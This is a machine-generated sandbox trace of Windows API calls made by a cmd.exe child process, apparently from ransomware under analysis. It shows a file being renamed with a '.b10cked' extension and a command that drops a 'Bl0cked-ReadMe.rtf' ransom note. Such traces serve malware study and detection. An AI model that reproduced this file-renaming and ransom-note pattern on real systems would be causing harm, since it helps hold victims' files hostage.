lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", fInfoLevelId=0x1, lpFindFileData=0x381c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381c10) returned 0x370eb8 [0210.949] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", nBufferLength=0x104, lpBuffer=0x1eebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", lpFilePart=0x0) returned 0x3d [0210.949] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url", nBufferLength=0x104, lpBuffer=0x1eebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url", lpFilePart=0x0) returned 0x35 [0210.949] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url")) returned 0x20 [0210.949] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url.b10cked"), dwFlags=0x3) returned 1 [0210.949] FindClose (in: hFindFile=0x370eb8 | out: hFindFile=0x370eb8) returned 1 [0210.949] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eeb60 | out: _Buffer=" 1") returned 9 [0210.949] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.949] GetFileType (hFile=0x7) returned 0x2 [0211.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeaec | out: lpMode=0x1eeaec) returned 1 [0211.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.047] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb20 | out: lpConsoleScreenBufferInfo=0x1eeb20) returned 1 [0211.047] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0211.047] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0211.047] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eeb44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb44*=0x1a) returned 1 [0211.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.048] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.048] SetConsoleInputExeNameW () returned 0x1 [0211.048] GetConsoleOutputCP () returned 0x1b5 [0211.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.048] exit (_Code=0) Process: id = "514" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x370" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30989 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30990 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30991 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30992 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30993 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30994 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30995 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30996 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30997 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30998 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31033 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31034 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31035 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31036 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31037 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31038 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31039 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31040 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31041 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31042 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31043 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31044 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31045 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31046 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31047 start_va = 0x470000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 31048 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31049 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31050 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31051 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31052 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31053 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31054 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 31055 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 31056 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Thread: id = 714 os_tid = 0x938 [0210.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fbb4 | out: lpSystemTimeAsFileTime=0x22fbb4*(dwLowDateTime=0xb28fc420, dwHighDateTime=0x1d440a9)) [0210.969] GetCurrentProcessId () returned 0x370 [0210.969] GetCurrentThreadId () returned 0x938 [0210.969] GetTickCount () returned 0x3b376 [0210.969] QueryPerformanceCounter (in: lpPerformanceCount=0x22fbac | out: lpPerformanceCount=0x22fbac*=26775853588) returned 1 [0210.970] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0210.970] __set_app_type (_Type=0x1) [0210.970] __p__fmode () returned 0x76b331f4 [0210.970] __p__commode () returned 0x76b331fc [0210.970] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0210.970] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0210.970] GetCurrentThreadId () returned 0x938 [0210.970] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x938) returned 0x38 [0210.971] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.971] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0210.971] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.971] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.971] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fb44 | out: phkResult=0x22fb44*=0x0) returned 0x2 [0210.971] VirtualQuery (in: lpAddress=0x22fb7b, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0210.971] GetConsoleOutputCP () returned 0x1b5 [0210.971] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.971] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0210.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.971] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0210.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.972] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.972] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.972] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.972] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0210.972] GetEnvironmentStringsW () returned 0x2c0180* [0210.972] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0210.972] GetEnvironmentStringsW () returned 0x2c0180* [0210.973] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0210.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eab4 | out: phkResult=0x22eab4*=0x40) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0xa8, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x0, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegCloseKey (hKey=0x40) returned 0x0 [0210.973] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eab4 | out: phkResult=0x22eab4*=0x40) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x0, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegCloseKey (hKey=0x40) returned 0x0 [0210.973] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ad [0210.973] srand (_Seed=0x5b8863ad) [0210.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" [0210.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" [0210.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0210.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0210.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.974] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0210.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0210.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0210.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0210.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0210.974] GetEnvironmentStringsW () returned 0x2c22d0* [0210.974] FreeEnvironmentStringsW (penv=0x2c22d0) returned 1 [0210.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0210.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0210.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0210.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0210.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0210.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f880, lpFilePart=0x22f87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f87c*="Desktop") returned 0x18 [0210.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.975] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.975] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.976] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0210.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0210.976] GetEnvironmentStringsW () returned 0x2c2af0* [0210.976] FreeEnvironmentStringsW (penv=0x2c2af0) returned 1 [0210.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.976] GetConsoleOutputCP () returned 0x1b5 [0210.976] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.977] GetUserDefaultLCID () returned 0x409 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="0") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="0") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="1") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0210.977] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.978] GetConsoleTitleW (in: lpConsoleTitle=0x2b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0210.979] _wcsicmp (_String1="type", _String2=")") returned 75 [0210.979] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0210.979] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0210.979] _wcsicmp (_String1="IF", _String2="type") returned -11 [0210.979] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0210.979] _wcsicmp (_String1="REM", _String2="type") returned -2 [0210.979] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 